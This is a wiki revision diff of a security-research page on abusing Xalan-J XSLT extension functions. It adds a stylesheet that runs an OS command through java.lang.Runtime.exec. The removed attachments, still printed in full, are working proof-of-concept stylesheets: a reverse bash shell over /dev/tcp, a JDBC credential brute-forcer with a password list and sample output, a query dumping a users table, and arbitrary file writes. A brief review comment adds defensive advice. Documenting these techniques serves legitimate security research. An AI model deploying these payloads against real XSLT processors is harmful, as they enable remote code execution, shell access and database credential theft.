Changes for page Engine_XalanJ
on 2012/01/12 22:14
on 2012/01/11 23:31
Summary
Page properties (1 modified, 0 added, 0 removed)
Attachments (0 modified, 0 added, 6 removed)
Details
- Page properties
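--- a/Engine_XalanJ/Content
+++ b/Engine_XalanJ/Content
@@ -22,7 +22,7 @@
 * Java properties disclosure
 * Java environment disclosure
 * Java code execution
-* OScommand execution
+* Arbitrary command execution
 * File creation
 * JDBC connectivity
 
@@ -48,42 +48,20 @@
 |http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date:
 Wed Jan 11 22:45:07 CET 2012
 
-== OS command execution ==
+== Command execution ==
 
- OnceJava code execution is possible, it is trivialtoexecute arbitraryOScommands using thejava.lang.Runtime class. The attached PoCwillnot read theoutputoftheexecuted command(because loops are hard in XSLT). But thisis nota problemif a reverse-shellhave already been started, isn't it ;-)
+The following code will execute the command "touch /tmp/hello" :
 
-|=Namespace|=Extension functions|=PoC
-|http:~/~/xml.apache.org/xalan/java|split(), getRuntime(), exec() and toString()|[[xalanj-reverse-bash.xsl>>attach:xalanj-reverse-bash.xsl]]
-
-__Note__ : as arrays are not a native type in XSLT, we create one in Java via split() before passing it as an argument to [[exec(String[] cmdarray)>>http://docs.oracle.com/javase/1.4.2/docs/api/java/lang/Runtime.html#exec(java.lang.String[])||rel="__blank"]].
-
-== File creation ==
-
-The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten.
-
-|=Namespace|=Extension element|=Parameter|=PoC
-|http:~/~/xml.apache.org/xalan/redirect|write|file|[[xalanj-write.xsl>>attach:xalanj-write.xsl]]
-
-== JDBC connectivity ==
-
-It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver.
-
-=== Simple connection ===
-
-The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result.
-
-|=Namespace|=Extension function|=PoC
-|org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]]
-
-=== Credentials brute-forcing ===
-
-The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-).
-
-
-Here's the output when launched from the CLI :
-
-##$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null
-Username : [root] / Password : [] :
-Username : [root] / Password : [uberpasswd] :
-Username : [root] / Password : [cnam] : OK !!
-Username : [pma] / Password : [pma] : ##
+<?xml version="1.0"?>
+<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform"
+ xmlns:j="http:~/~/xml.apache.org/xalan/java"
+ exclude-result-prefixes="j"
+ version="1.0">
+ <xsl:template match="/">
+ <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable>
+ <xsl:variable name="a" select="j:split($c, ' = ')"/>
+ <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/>
+ <xsl:variable name="p" select="j:exec($r, $a )"/>
+ No content at the moment ...
+ </xsl:template>
+</xsl:stylesheet>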
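Review bot: The new stylesheet binds the `java.lang.Process` returned by `j:exec($r, $a )` to `$p` and never uses it, so the transform output gives no indication of whether the command ran; the only evidence is the `/tmp/hello` side effect, and the placeholder text `No content at the moment ...` hides that. Replacing the placeholder with `<xsl:value-of select="j:toString($p)"/>` would at least show that a Process object was created, or the prose should say the result has to be checked on the filesystem. The revision also drops the earlier explanation of why the command string is passed through `split()`, which is the non-obvious part of the call; one sentence such as `The command is split on " = " because Runtime.exec(String[]) needs a Java array, which XSLT 1.0 cannot build natively.` would restore it. From a defensive angle the page should state that access to the `http://xml.apache.org/xalan/java` namespace is what makes this reachable, and that in JAXP `TransformerFactory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` is the documented control for disabling extension functions, with the caveat that whether a given Xalan-J build honours it needs to be verified.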
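--- a/xalanj-java-date.xsl
+++ b/xalanj-java-date.xsl
@@ -1,1 +1,0 @@ Author
-xwiki:XWiki.NicolasGregoire
@@ -1,1 +1,0 @@ Size
-409 bytes
@@ -1,11 +1,0 @@ Content
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:date="http://xml.apache.org/xalan/java/java.util.Date"
- exclude-result-prefixes="date">
- <xsl:output method="text"/>
- <xsl:template match="/">
- <xsl:variable name="dateObject" select="date:new()"/>
- <xsl:text>Current date: </xsl:text><xsl:value-of select="$dateObject"/>
- </xsl:template>
-</xsl:stylesheet>
-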
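--- a/xalanj-jdbc-bruteforce.xml
+++ b/xalanj-jdbc-bruteforce.xml
@@ -1,1 +1,0 @@ Author
-xwiki:XWiki.NicolasGregoire
@@ -1,1 +1,0 @@ Size
-775 bytes
@@ -1,35 +1,0 @@ Content
-<data>
- <foobar>
- <DBINFO>
- <dbdriver>com.mysql.jdbc.Driver</dbdriver>
- <dburl>jdbc:mysql://localhost/</dburl>
- <user>root</user>
- <password></password>
- </DBINFO>
- </foobar>
- <foobar>
- <DBINFO>
- <dbdriver>com.mysql.jdbc.Driver</dbdriver>
- <dburl>jdbc:mysql://localhost/</dburl>
- <user>root</user>
- <password>uberpasswd</password>
- </DBINFO>
- </foobar>
- <foobar>
- <DBINFO>
- <dbdriver>com.mysql.jdbc.Driver</dbdriver>
- <dburl>jdbc:mysql://localhost/</dburl>
- <user>root</user>
- <password>cnam</password>
- </DBINFO>
- </foobar>
- <foobar>
- <DBINFO>
- <dbdriver>com.mysql.jdbc.Driver</dbdriver>
- <dburl>jdbc:mysql://localhost/</dburl>
- <user>pma</user>
- <password>pma</password>
- </DBINFO>
- </foobar>
-</data>
-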
- xalanj-jdbc-bruteforce.xsl
- Author
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,1 +1,0 @@ 1 -979 bytes - Content
... ... @@ -1,29 +1,0 @@ 1 -<?xml version="1.0"?> 2 - 3 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 4 - version="1.0" 5 - xmlns:sql="org.apache.xalan.lib.sql.XConnection" 6 - extension-element-prefixes="sql"> 7 - 8 -<xsl:output method="text" indent="yes"/> 9 -<xsl:variable name="query">SELECT "OK !!"</xsl:variable> 10 - 11 -<xsl:template match="//data"> 12 - <xsl:for-each select="foobar"> 13 - 14 - <xsl:variable name="cinfo" select="DBINFO"/> 15 - <xsl:variable name="user" select="DBINFO/user/text()"/> 16 - <xsl:variable name="passwd" select="DBINFO/password/text()"/> 17 - 18 - <xsl:variable name="db" select="sql:new($cinfo)"/> 19 - <xsl:variable name="data" select='sql:query($db, $query)'/> 20 - 21 - <xsl:copy-of select="concat('Username : [', $user, '] / ')" /> 22 - <xsl:copy-of select="concat('Password : [', $passwd, '] : ')" /> 23 - <xsl:copy-of select="$data" /><xsl:copy-of select="'
'" /> 24 - 25 - </xsl:for-each> 26 -</xsl:template> 27 - 28 -</xsl:stylesheet> 29 -
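--- a/xalanj-jdbc-query.xsl
+++ b/xalanj-jdbc-query.xsl
@@ -1,1 +1,0 @@ Author
-xwiki:XWiki.NicolasGregoire
@@ -1,1 +1,0 @@ Size
-848 bytes
@@ -1,22 +1,0 @@ Content
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:sql="org.apache.xalan.lib.sql.XConnection"
- extension-element-prefixes="sql"
- version="1.0">
-
-<xsl:output method="xml" indent="yes"/>
-
-<xsl:param name="driver" select="'com.mysql.jdbc.Driver'"/>
-<xsl:param name="dburl" select="'jdbc:mysql://localhost/test_db'"/>
-<xsl:param name="user" select="'root'"/>
-<xsl:param name="pass" select="'14m31337'"/>
-<xsl:param name="query" select="'SELECT uid,username,passwd FROM users'"/>
-
-<xsl:template match="/">
- <xsl:variable name="dbh" select="sql:new($driver, $dburl, $user, $pass)"/>
- <xsl:variable name="table" select='sql:query($dbh, $query)'/>
- <xsl:copy-of select="$table" />
- <xsl:value-of select="sql:close($db)"/>
-</xsl:template>
-
-</xsl:stylesheet>
-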
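--- a/xalanj-reverse-bash.xsl
+++ b/xalanj-reverse-bash.xsl
@@ -1,1 +1,0 @@ Author
-xwiki:XWiki.NicolasGregoire
@@ -1,1 +1,0 @@ Size
-1002 bytes
@@ -1,31 +1,0 @@ Content
-<xsl:stylesheet
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:jv="http://xml.apache.org/xalan/java"
- exclude-result-prefixes="jv"
- version="1.0">
-
- <xsl:template match="/">
-
- <xsl:variable name="test"><![CDATA[/bin/bash ==== -c ==== /bin/bash 7<>/dev/tcp/127.0.0.1/4444 <&7 >&7]]></xsl:variable>
- <xsl:variable name="a" select="jv:split($test, ' ==== ')"/>
- <xsl:variable name="rtobject" select="jv:java.lang.Runtime.getRuntime()"/>
- <xsl:variable name="process" select="jv:exec($rtobject, $a )"/>
-
-Objet "String" :
- <xsl:value-of select="$test"/>
-
-Objet "Array" :
- <xsl:variable name="aAsString" select="jv:toString($a)"/>
- <xsl:value-of select="$aAsString"/>
-
-Objet "Runtime" :
- <xsl:variable name="rtobjectAsString" select="jv:toString($rtobject)"/>
- <xsl:value-of select="$rtobjectAsString"/>
-
-Objet "Process" :
- <xsl:variable name="processAsString" select="jv:toString($process)"/>
- <xsl:value-of select="$processAsString"/>
-
- </xsl:template>
-</xsl:stylesheet>
-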
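--- a/xalanj-write.xsl
+++ b/xalanj-write.xsl
@@ -1,1 +1,0 @@ Author
-xwiki:XWiki.NicolasGregoire
@@ -1,1 +1,0 @@ Size
-373 bytes
@@ -1,13 +1,0 @@ Content
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:redir="http://xml.apache.org/xalan/redirect"
- extension-element-prefixes="redir"
- version='1.0'>
-
- <xsl:template match="/">
- <redir:write file="/tmp/created_by_xalanj_write" method="text">
- <xsl:text>Just a PoC</xsl:text>
- </redir:write>
- </xsl:template>
-
-</xsl:stylesheet>
-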